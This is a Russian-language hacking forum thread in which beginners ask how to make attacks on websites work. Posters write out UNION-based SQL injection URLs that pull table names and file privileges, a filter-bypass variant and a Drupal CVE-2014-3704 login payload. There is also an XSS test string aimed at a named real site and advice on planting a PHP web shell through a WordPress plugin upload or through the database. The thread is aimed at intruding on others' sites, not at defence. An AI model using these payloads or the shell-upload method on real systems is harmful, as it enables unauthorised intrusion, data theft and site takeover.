вопрос от начинающего база 5.0.95 вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables-- нахожу нужную мне таблицу например у меня modx_active_users - делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name='modx_active_users'-- и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1 так как начинающий я непойму что делаю нетак!?
кроме ( и ) еще *, WAF на and. во всех полях ругался на кодировку, кроме 4. там и вывод номральный Code: partenaires/partenaires.cgi?CAT=1+|+1=0+union+select+1,2,3,table_name,5,6+from+information_schema.tables--+&PAYS=AF
Есть сайт со sqli (старая версия drupal) CVE-2014-3704 Использовал следующие эксплоиты: http://www.exploit-db.com/exploits/34993/ http://www.exploit-db.com/exploits/34992/ http://www.exploit-db.com/exploits/34984/ Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан. Как раскрутить я не знаю. Sqli при пост запросе: http://www.site.com/?q=node&destination=node name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin output:
При проверки на XSS сайт на экране "7" (не всплывающая) Code: chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E 2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
возможно WAF. обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается почему то выдает грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет. что в таком случае можно сделать? также рут в бд, но пути не раскрываются
Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
вопрос хочю проверить наличие File_Priv узнаю пользователя так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- получаю u1094094_sangha@дальше ip. далле хочу узнать наличие File_Priv вот так http://www.site.com/news.php?id=33+and+1=0+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user+where+user='u1094094_sangha'-- и получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'u1094094_sangha\'--' at line 1 (совет учить английский не помог) что делаю нетак?
если грузить пхп а не зип то будет в папке аплоадс. но ето сути не меняет. не открывается так и так как я понял сервер фильтрует евал и бас64. через простой пхп echo phpinfo(); открылось, залил через бд в корень. один фиг шел не открывается пишел соединение закрыто удаленым сервером
